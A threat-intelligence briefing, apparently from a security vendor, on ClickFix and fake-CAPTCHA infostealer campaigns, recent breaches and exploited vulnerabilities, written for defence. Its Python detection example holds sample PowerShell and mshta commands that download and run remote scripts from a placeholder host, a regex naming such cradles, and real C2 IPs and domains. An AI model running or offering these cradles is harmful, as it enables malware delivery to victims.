
This week, we briefed our clients on new research that shows ClickFix & Fake CAPTCHA are thriving. We also discussed recent breaches that made the news.
KEY TAKEAWAYS
- Cyber-extortion group Scattered Spider's campaign against the retail industry shifts focus to the U.S. Learn their TTPs and how to protect against them.
- Critical vulnerabilities in Fortinet, Cisco, SonicWall, Google Chrome, and ASUS. Patch now!
ClickFix & Fake CAPTCHA Continue To Thrive
ClickFix & Fake CAPTCHA is an increasingly common technique used by threat actors to gain initial access. Threat actors either compromise legitimate websites or host their own sites that prompt the user to copy malicious code and trick them into running it on their own system.
Fig. 1: Fake CAPTCHA prompt | Source: Elastic Security
This technique is commonly used to deliver either infostealer malware or loader malware that further infects the victim with additional malicious payloads such as ransomware.
Fake CAPTCHA Pushes EDDIESTEALER
New research from Elastic Security details EDDIESTEALER, a new infostealer written in Rust that is being distributed via fake CAPTCHA sites. This infostealer targets user data including credentials, browser information, and cryptocurrency wallets. One notable detail in Elastic's research is EDDIESTEALER's ability to extract data from web browsers. The malware authors implemented a Rust-based version of ChromeKatz, a utility for dumping sensitive data from the memory of Chromium-based browsers. This allows the malware to harvest data such as cookies and session data. Elastic's research also shows EDDIESTEALER's ability to manipulate Chrome browsers into dumping plaintext credentials stored in the browser's Password Manager.
Beyond ClickFix
Researchers at TrendMicro detailed a new campaign that is delivering Vidar and StealC infostealer malware via TikTok videos. The delivery method is a similar concept to ClickFix, where the user is tricked into running malicious code themselves via the Windows Run prompt. However, instead of a fake error message or fake CAPTCHA page that gives the user instructions, AI-generated videos on TikTok convince users to run the malicious code, claiming it will either activate or unlock premium features in software. The end result is the same: the user is tricked into running malicious PowerShell code that downloads malware onto the victim's computer.
How to Protect Your Organization
- User Awareness Training - ClickFix and Fake CAPTCHA are social engineering attacks. Their success lies in their ability to trick the user. The best way to prevent this is to train and educate users on how these attacks operate.
- Disable Windows Run Command - Most users in an organization should not need the ability to run commands or code on their workstations. The Windows Run command can be disabled by administrators via GPO. Details for this process can be found here.
- Deploy up-to-date EDR - All endpoints should have fully patched and up-to-date EDR tools. This will help detect and block infostealer malware that users do eventually download.
- Network Detection - Network detection tools such as PacketWatch can detect traffic to suspicious download sites and command & control (C2) traffic of any malware that evades EDR protections.
- Restrict Web Traffic - Consider blocking traffic to social media and other content-sharing websites for workstations. Ideally, only web traffic to work-related sites should be allowed.
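The Run-prompt abuse described above leaves a recognizable pattern in process-creation telemetry: a script interpreter spawned directly by explorer.exe (the parent of anything launched from the Win+R box) with a download cradle or evasion switch on its command line. The following Python is an added example, not code from PacketWatch, Elastic, or TrendMicro; it assumes Sysmon-style events with parent, image, and command-line fields, and the sample events are constructed.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style); not real telemetry.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr http://example.invalid/x.ps1 | iex"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta http://example.invalid/verify.hta"},
    # Benign: PowerShell launched by a developer tool, not from the Run box.
    {"parent": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -File build.ps1"},
    # Benign: a non-interpreter launched from the Run box.
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]

# Interpreters that ClickFix-style lures tell the user to paste into the Run box.
RUN_BOX_INTERPRETERS = ("powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe")

# Command-line cues: download cradles, remote script URLs, hidden windows, encoded commands.
SUSPICIOUS_CMD = re.compile(
    r"(iwr|invoke-webrequest|downloadstring|\biex\b|invoke-expression|"
    r"-e(nc|ncodedcommand)?\b|-w(indowstyle)?\s+hidden|https?://)",
    re.IGNORECASE,
)


def _basename(path):
    """Return the lower-cased file name of a Windows path."""
    return path.lower().rsplit("\\", 1)[-1]


def is_clickfix_candidate(event):
    """True when explorer.exe spawned a Run-box interpreter with suspicious arguments."""
    if _basename(event["parent"]) != "explorer.exe":
        return False
    if _basename(event["image"]) not in RUN_BOX_INTERPRETERS:
        return False
    return SUSPICIOUS_CMD.search(event["cmdline"]) is not None


def find_candidates(events):
    """Return the command lines of all events worth an analyst's attention."""
    return [e["cmdline"] for e in events if is_clickfix_candidate(e)]
```

Tune RUN_BOX_INTERPRETERS and SUSPICIOUS_CMD to your environment; legitimate admin scripts launched from the Run box will match and should be reviewed rather than auto-blocked.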
Find it in PacketWatch
PacketWatch query for EDDIESTEALER C2 IPs:
*.ip:(45.144.53.145 OR 84.200.154.47)
PacketWatch query for EDDIESTEALER domain infrastructure:
http.host:(shiglimugli.xyz OR xxxivi.com OR llll.fit OR plasetplastik.com OR militrex.wiki)
Resources:
- https://www.elastic.co/security-labs/eddiestealer
- https://www.trendmicro.com/en_us/research/25/e/tiktok-videos-infostealers.html
- https://github.com/Meckazin/ChromeKatz
- https://thehackernews.com/2025/05/eddiestealer-malware-uses-clickfix.html
- https://www.thewindowsclub.com/enable-or-disable-run-command-winr-box-in-windows-10
- https://expel.com/blog/following-the-spiders-investigating-lactrodectus-malware/
- https://thehackernews.com/2025/05/hackers-use-tiktok-videos-to-distribute.html
Notable Data Breaches
ConnectWise
On May 28, ConnectWise disclosed that they observed suspicious activity in their ScreenConnect cloud environment which they believe is tied to a nation-state actor. The notification states it impacted only a small number of customers, and that each impacted customer has been notified directly by ConnectWise. While the advisory did not disclose exactly how the intrusion happened, it does contain several mentions of a patch they released on April 24 for CVE-2025-3935. Administrators are advised to ensure they patch ScreenConnect to version 25.2.4 or higher. PacketWatch will continue to monitor this incident for further details.
LexisNexis
LexisNexis Risk Solutions, a data analytics company used by the majority of Fortune 500 companies, disclosed that threat actors stole PII for over 364,000 individuals in December 2024. The PII includes name, phone number, email address, postal address, Social Security number, driver's license number, and date of birth. Investigation of the breach shows the data was harvested from GitHub (third-party infrastructure) and not from LexisNexis itself.
Resources:
- https://www.connectwise.com/company/trust/advisories
- https://thehackernews.com/2025/05/connectwise-hit-by-cyberattack-nation.html
- https://www.bleepingcomputer.com/news/security/data-broker-lexisnexis-discloses-data-breach-affecting-364-000-people/
Vulnerability Roundup
Chinese Espionage Group Actively Exploiting Ivanti EPMM
A pair of medium-severity vulnerabilities in Ivanti Endpoint Manager Mobile (EPMM) version 12.5.0.0 and earlier was disclosed on May 15. Tracked as CVE-2025-4427 and CVE-2025-4428, these vulnerabilities can be chained together to achieve unauthenticated remote code execution (RCE). Research from EclecticIQ shows these vulnerabilities were actively exploited as 0-days by a Chinese espionage group tracked as UNC5221. Proof-of-concept exploit code for these vulnerabilities is also in the wild. Administrators are urged to patch as soon as possible. As Ivanti products have been heavily targeted by threat actors due to a multitude of high- and critical-severity vulnerabilities in recent years, organizations that choose to continue using this product should monitor it closely for unusual activity.
- https://blog.eclecticiq.com/china-nexus-threat-actor-actively-exploiting-ivanti-endpoint-manager-mobile-cve-2025-4428-vulnerability
- https://thehackernews.com/2025/05/chinese-hackers-exploit-ivanti-epmm.html
- https://thehackernews.com/2025/05/ivanti-patches-epmm-vulnerabilities.html
- https://www.ivanti.com/blog/epmm-security-update
CISA KEV Additions
The following vulnerabilities were added to CISA's Known Exploited Vulnerabilities Catalog in the last 2 weeks:
- CVE-2023-38950 - ZKTeco BioTime Path Traversal Vulnerability
- CVE-2024-27443 - Synacor Zimbra Collaboration Suite (ZCS) Cross-Site Scripting (XSS) Vulnerability
- CVE-2025-27920 - Srimax Output Messenger Directory Traversal Vulnerability
- CVE-2024-11182 - MDaemon Email Server Cross-Site Scripting (XSS) Vulnerability
- CVE-2025-4428 - Ivanti Endpoint Manager Mobile (EPMM) Code Injection Vulnerability
- CVE-2025-4427 - Ivanti Endpoint Manager Mobile (EPMM) Authentication Bypass Vulnerability
- CVE-2025-4632 - Samsung MagicINFO 9 Server Path Traversal Vulnerability
NOTE
We have enhanced our report with data from SOCRadar. You may need to register to view their threat intelligence content.
DISCLAIMER
Kindly be advised that the information contained in this article is presented with no final evaluation and should be considered raw data. The sole purpose of this information is to provide situational awareness based on the currently available knowledge. We recommend exercising caution and conducting further research as necessary before making any decisions based on this information.